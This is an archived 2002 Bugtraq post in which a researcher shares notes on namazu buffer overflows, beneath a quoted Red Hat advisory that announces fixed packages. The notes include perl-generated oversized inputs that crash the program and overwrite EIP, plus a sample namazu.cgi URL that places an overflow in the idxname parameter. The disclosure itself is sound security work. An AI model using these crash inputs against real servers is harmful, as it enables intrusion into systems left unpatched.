[23791] in bugtraq
Details on the updated namazu packages that are available
daemon@ATHENA.MIT.EDU (KF)
Thu Jan 10 13:59:30 2002
Message-ID: <3C3CCEFE.6080501@snosoft.com>
Date: Wed, 09 Jan 2002 18:15:10 -0500
From: KF <dotslash@snosoft.com>
MIME-Version: 1.0
Cc: bugtraq@securityfocus.com
Content-Type: text/plain; charset=us-ascii; format=flowed
Content-Transfer-Encoding: 7bit
Doh! Looks like I slept on this one too long... heres some of my
personal notes on exploiting this issue. Have fun.
-KF
[root@linuxppc root]# cat misc/namzu-overflow.txt
http://www.altavista.com/sites/search/web?q=url%3Anamazu.cgi&kl=XX
This is what caught my attention
[msg(XXX)] like 12 days old
[msg(XXX)] 2001-12-12 NOKUBI Takatsugu <knok@daionet.gr.jp>
[msg(XXX)] (nmz_choose_msgfile_suffix): Fixed buffer overflow.
[msg(XXX)]
http://cvs.namazu.org/~checkout~/namazu/ChangeLog?rev=1.912&content-type=text/plain
2001-12-11 NOKUBI Takatsugu <knok@daionet.gr.jp>
* nmz/field.c: Fixed possibility of buffer overflow.
2001-12-04 NOKUBI Takatsugu <knok@daionet.gr.jp>
* src/{form.c,rcfile.c,result.c}: Fixed possibility of buffer overflow.
* src/cgi.c (validate_idxname): Fixed another cross-site scripting
vulnerability.
(cgi_get_vars): Fixed possibility of buffer overflow.
2001-07-03 Yoshinori TAKESAKO <takesako@namazu.org>
* src/result.c (my_strcasestr): Checked a buffer overflow,
the case where a character sequence was over at the 1st byte
of EUC-JP.
Here is my research on the above issues:
There are several buffer overflows in the QUERY_STRING options
Unfortunately the check in namazu.h screws us...
[root@linuxppc src]# grep CGI_QUERY_MAX *.h
namazu.h: CGI_QUERY_MAX = 512, /* Max length of a CGI query */
cgi.c: if (contlen > CGI_QUERY_MAX) {
cgi.c: printf(_("Too long QUERY_STRING"));
In other words unless you have modified namazu then you are not vuln.
Now we can exploit this via the command line as a side note ... although
its not suid...
[root@linuxppc src]# ./namazu querystring `perl -e 'print "A" x 1024'`
Results:
References: [ (can't open the index) ]
No document matching your query.
Aborted (core dumped)
The eip is easily overwritten.Here only the first 2 bytes...
Starting program: /root/namazu-2.0.5/src/../src/.libs/lt-namazu yamom
`perl -e 'print "A" x 1342'`
Program received signal SIGILL, Illegal instruction.
0x41412f4c in ?? ()
So just for theory sake and cuz I want to
code something...
we will say that we are using a Custom namazu that we modified the
following values in namazu.h.
CGI_QUERY_MAX = 512, /* Max length of a CGI query */
CGI_INDEX_NAME_MAX = 64, /* Max length of an index name in a CGI
query */
Then we could be exploited.
cgi-bin/namazu.cgi?query=overflow&whence=0=en&idxname=<bof here> would
be a quick example.
-KF
bugzilla@redhat.com wrote:
> ---------------------------------------------------------------------
> Red Hat, Inc. Red Hat Security Advisory
>
> Synopsis: Updated namazu packages are available
> Advisory ID: RHSA-2001:179-05
> Issue date: 2001-12-27
> Updated on: 2002-01-09
> Product: Red Hat Linux
> Keywords: namazu cross-site scripting buffer overflow
> Cross references:
> Obsoletes: RHSA-2001:162
> ---------------------------------------------------------------------
>
> 1. Topic:
>
> Updated namazu packages are available for Red Hat Linux 7.0J. These
> packages fix cross-site scripting vulnerabilities. It also fixes a possible
> buffer overflow.
>
> 2. Relevant releases/architectures:
>
> Red Hat Linux 7.0J - i386
>
> 3. Problem description:
>
> Namazu is a full-text search engine. Namazu 2.0.9 and earlier may
> inadvertently include malicious HTML tags or scripts in a dynamically
> generated page, based on unvalidated input from untrustworthy sources.
> Also, a buffer overflow vulnerability exists in the buffer size of an
> environment variable.
>
> These packages update Namazu to version 2.0.10 which is not vulnerable to
> these issues.
>
> 4. Solution:
>
> Before applying this update, make sure all previously released errata
> relevant to your system have been applied.
>
> To update all RPMs for your particular architecture, run:
>
> rpm -Fvh [filenames]
>
> where [filenames] is a list of the RPMs you wish to upgrade. Only those
> RPMs which are currently installed will be updated. Those RPMs which are
> not installed but included in the list will not be updated. Note that you
> can also use wildcards (*.rpm) if your current directory *only* contains the
> desired RPMs.
>
> Please note that this update is also available via Red Hat Network. Many
> people find this an easier way to apply updates. To use Red Hat Network,
> launch the Red Hat Update Agent with the following command:
>
> up2date
>
> This will start an interactive process that will result in the appropriate
> RPMs being upgraded on your system.
>
> 5. Bug IDs fixed (http://bugzilla.redhat.com/bugzilla for more info):
>
>
>
> 6. RPMs required:
>
> Red Hat Linux 7.0J:
>
> SRPMS:
> ftp://updates.redhat.com/7.0/ja/os/SRPMS/namazu-2.0.10-0j1.src.rpm
>
> i386:
> ftp://updates.redhat.com/7.0/ja/os/i386/namazu-2.0.10-0j1.i386.rpm
> ftp://updates.redhat.com/7.0/ja/os/i386/namazu-devel-2.0.10-0j1.i386.rpm
> ftp://updates.redhat.com/7.0/ja/os/i386/namazu-cgi-2.0.10-0j1.i386.rpm
>
>
>
> 7. Verification:
>
> MD5 sum Package Name
> --------------------------------------------------------------------------
> 521c9faef31dcd865d3e0090cd023d70 7.0/ja/os/SRPMS/namazu-2.0.10-0j1.src.rpm
> ae5d586caf2098a0b9aefcc7af6522a9 7.0/ja/os/i386/namazu-2.0.10-0j1.i386.rpm
> 904dc3993c140794373471e8a1c64c61 7.0/ja/os/i386/namazu-cgi-2.0.10-0j1.i386.rpm
> af30f16968c527ac9e7669c812618cde 7.0/ja/os/i386/namazu-devel-2.0.10-0j1.i386.rpm
>
>
> These packages are GPG signed by Red Hat, Inc. for security. Our key
> is available at:
> http://www.redhat.com/about/contact/pgpkey.html
>
> You can verify each package with the following command:
> rpm --checksig <filename>
>
> If you only wish to verify that each package has not been corrupted or
> tampered with, examine only the md5sum with the following command:
> rpm --checksig --nogpg <filename>
>
> 8. References:
>
> http://www.namazu.org/#news
>
>
> Copyright(c) 2000, 2001, 2002 Red Hat, Inc.
>
>
>
>
